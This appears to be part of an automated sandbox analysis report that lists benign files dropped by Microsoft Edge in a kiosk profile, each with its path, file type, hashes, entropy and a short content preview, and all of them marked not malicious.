C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.5559635235158827
Encrypted:	false
SSDEEP:	48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:OIEumQv8m1ccnvS6
MD5:	9AAAE8C040B616D1378F3E0E17689A29
SHA1:	F91E7DE07F1DA14D15D067E1F50C3B84A328DBB7
SHA-256:	5B94D63C31AE795661F69B9D10E8BFD115584CD6FEF5FBB7AA483FDC6A66945B
SHA-512:	436202AB8B6BB0318A30946108E6722DFF781F462EE05980C14F57F347EDDCF8119E236C3290B580CEF6902E1B59FB4F546D6BD69F62479805B39AB0F3308EC1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.36515621748816035
Encrypted:	false
SSDEEP:	24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
MD5:	25363ADC3C9D98BAD1A33D0792405CBF
SHA1:	D06E343087D86EF1A06F7479D81B26C90A60B5C3
SHA-256:	6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
SHA-512:	CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a45f8908-1eb7-4b6e-9335-f0a1b26ec460.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\b5ad0178-067b-456e-8337-de460ec5cca1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
MD5:	285252A2F6327D41EAB203DC2F402C67
SHA1:	ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
SHA-256:	5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
SHA-512:	11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.7273991737283296
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
MD5:	9F7EADC15E13D0608B4E4D590499AE2E
SHA1:	AFB27F5C20B117031328E12DD3111A7681FF8DB5
SHA-256:	5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
SHA-512:	88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
Malicious:	false
Preview:	*...#................version.1..namespace-..&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	393
Entropy (8bit):	5.146880951144375
Encrypted:	false
SSDEEP:	6:PIsXXs1923oH+Tcwt0jqEKj0QM72KLllIsfM+q2P923oH+Tcwt0jqEKj0QMxIFUv:PI2BYebqqB6LnI7+v4YebqqBZFUv
MD5:	1AC8DF15256E3DC1E48DB90AB5BB1168
SHA1:	CE33D66B6011AC5A077187B0F8D2497C75FFA93F
SHA-256:	3765B0C5703845DD6068F54F80EB5330CC899C7D47466907096C21009AC48E8F
SHA-512:	7C980935274F30AAFA8EB2EA4B15F1D5476C4EA11EA38D21C8D3E7C7829F90FCE5FF0FE8AD221641F69F9CDEE3B494DDD7F9E3095C659296E91E25982FB024E6
Malicious:	false
Preview:	2024/09/01-00:28:29.928 1e1c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage since it was missing..2024/09/01-00:28:29.968 1e1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Sync Data\LevelDB\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Sync Data\LevelDB\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.019797536844534
Encrypted:	false
SSDEEP:	3:sLollttz6sjlGXU2tkn:qolXtWswXU2tkn
MD5:	90881C9C26F29FCA29815A08BA858544
SHA1:	06FEE974987B91D82C2839A4BB12991FA99E1BDD
SHA-256:	A2CA52E34B6138624AC2DD20349CDE28482143B837DB40A7F0FBDA023077C26A
SHA-512:	15F7F8197B4FC46C4C5C2570FB1F6DD73CB125F9EE53DFA67F5A0D944543C5347BDAB5CCE95E91DD6C948C9023E23C7F9D76CFF990E623178C92F8D49150A625
Malicious:	false
Preview:	...n'................_mts_schema_descriptor...

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Sync Data\LevelDB\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.202685272725116
Encrypted:	false
SSDEEP:	6:PIQpfhRM1923oH+Tcwtkx2KLllIQpoeyq2P923oH+TcwtCIFUv:PIQpvhYebkVLnIQpoeyv4YebLFUv
MD5:	142AD26900BBB60E123396F6E1FB869D
SHA1:	DCC39A4F8251E0487FF5B98064DDA179A706B54E
SHA-256:	B48A8BF59FD3C437ABFCE52793516ECEBDC7037858042B7CD3BF750D718F8D42
SHA-512:	0EBD10722A1E16F78BAF8D297218185E3F1051E4746FF0EF6B3E318BE760BE8CE0D97977EF05ABD1E0E03B8C8181C2070FE5BA65357901D89CC5B9DCB498DC44
Malicious:	false
Preview:	2024/09/01-00:28:12.858 1d54 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Sync Data\LevelDB since it was missing..2024/09/01-00:28:12.886 1d54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Sync Data\LevelDB/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Sync Data\LevelDB\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Top Sites

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.3528485475628876
Encrypted:	false
SSDEEP:	12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
MD5:	F2B4FB2D384AA4E4D6F4AEB0BBA217DC
SHA1:	2CD70CFB3CE72D9B079170C360C1F563B6BF150E
SHA-256:	1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
SHA-512:	48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Visited Links

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.002110589502647469
Encrypted:	false
SSDEEP:	3:ImtVZ9kVg/lll:IiVDz
MD5:	45C1A0BF5D786E564A4D63DC0EF505F3
SHA1:	9D333F622250E3E3246A1261D6B427D90547FA99
SHA-256:	00864565F59F24423498D0B45E6A63C1402D5436F41CC13DEB5B0C7411BA5EA5
SHA-512:	25F3CBE76FCA5E204759855BB3BD6504478C75A6FC3870E1B2DBA62653025116B8BC9F853CE25C0E41BB3B85858498396E351018919576A61529350B3FD9EBE5
Malicious:	false
Preview:	VLnk.....?......:....ApE................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 4, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	182272
Entropy (8bit):	1.0771529909868247
Encrypted:	false
SSDEEP:	192:erb2qAdB9TbTbuDDsnxCkOTSAE+WslKOMq+vVumY4Kn66:e/2qOB1nxCkOTSAELyKOMq+vVumyp
MD5:	B7A2B9042001526AE4BE721358F2C359
SHA1:	0600AD56BF1BB35B5BC7CBC87D9C94734EB7E749
SHA-256:	3E0C4102B32AA4C1D523969A3CE540BE8C293919A2C3B4AF6ECB71A0A57BCC65
SHA-512:	7F8A3D8911FCB1252F76CC35699CDD57695DB0C6B80C16D7E0801E109E9E1D1FA61EA1611CAF6C11C5E49B2AD3F0B9CA8D62149628C20ED372AA6285370E845B
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\WebAssistDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	0.7836182415564406
Encrypted:	false
SSDEEP:	24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
MD5:	AA9965434F66985F0979719F3035C6E1
SHA1:	39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
SHA-256:	F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
SHA-512:	201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\a7aa8dfa-dfbf-4ac9-9588-d1f24c8218f0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\d27e5a4e-dc50-4224-a10f-619286254b40.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6572
Entropy (8bit):	4.975814900793566
Encrypted:	false
SSDEEP:	96:styqfVis1mOrb90bn90YVyN8z5D+2Ys85eh6Cb7/x+6MhmuecmAempQF2M0/EJ:styJsZQ9dUNk5Dks88bV+FiACP0MJ
MD5:	D22AA3BB07B6601F9905654F3DC9E925
SHA1:	18266E72AE7B08424C22095F8F0484D6001A562B
SHA-256:	A8AB212EAAAB1ED73976F50416701F16DBF7139AB100AB14AE7A42B5183EB938
SHA-512:	9672C2963BC2A8B491E665D699081962F33ECFB6D18D9524DDBA2CA889F039795D48748079F587D72EB41148F0430EB9AF61DE84CCB86740E4B1F2B911C09CA6
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13369638493353282","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"domain_diversity":{"last_reporting_timestamp":"13369638493355645"},"download":{"default_directory":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\KioskDownloads\\","directory_upgrade":true},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\da758b5e-edea-4db9-8fac-49af378f0d11.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\e2b2ffcc-afc3-44ff-9fd8-5708e7dde5ea.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6292
Entropy (8bit):	4.969442165425384
Encrypted:	false
SSDEEP:	96:styqfVis1lrb90bn90YVyN8z5D+2Ys85eh6Cb7/x+6MhmuecmAem0N2M0/EJ:styJsfQ9dUNk5Dks88bV+FiA+P0MJ
MD5:	A34119765626778A790D46742232A283
SHA1:	75E9608C9175AEFA3EDAB00D132AA95F70989674
SHA-256:	FA957A038586E7A59A4FC248DE7EFF21CD986D295A6DCDFC4FF537C132E5DFD2
SHA-512:	1C7805E04B214B6DEF95DC13B632E906C891BFFCBEE964171B99D69902DE355C35BF59AFAB1C781387F6D24B0B5C7610D5BCA0888BE66588B5DF9DE4184E609E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13369638493353282","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"domain_diversity":{"last_reporting_timestamp":"13369638493355645"},"download":{"default_directory":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\KioskDownloads\\","directory_upgrade":true},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\e33caf9e-5314-4929-9ab0-322aa61fe96a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6426
Entropy (8bit):	4.976799751826221
Encrypted:	false
SSDEEP:	96:styqfVis1lrb90bn90YVyN8z5D+2Ys85eh6Cb7/x+6MhmuecmAemaQF2M0/EJ:styJsfQ9dUNk5Dks88bV+FiAPP0MJ
MD5:	8198287A5434ADB14D7DD2B3B213534D
SHA1:	73FC889F32F5090CA0B6193E10F51EC95959150B
SHA-256:	7F4210A3516C9AA6D32B64CC79C23609C745FA35EFAEAD4C5F5CC4F419E4E6E9
SHA-512:	299B30AC56F93BFC34D2B71AD7C2A869D975736E7760F22EDAD3EB71AAD4EDB038DFF39E9CB0D0E1F03F223EDF504BD738D08A748EA592CC2A15E3188742B8B6
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13369638493353282","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"domain_diversity":{"last_reporting_timestamp":"13369638493355645"},"download":{"default_directory":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\KioskDownloads\\","directory_upgrade":true},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version"

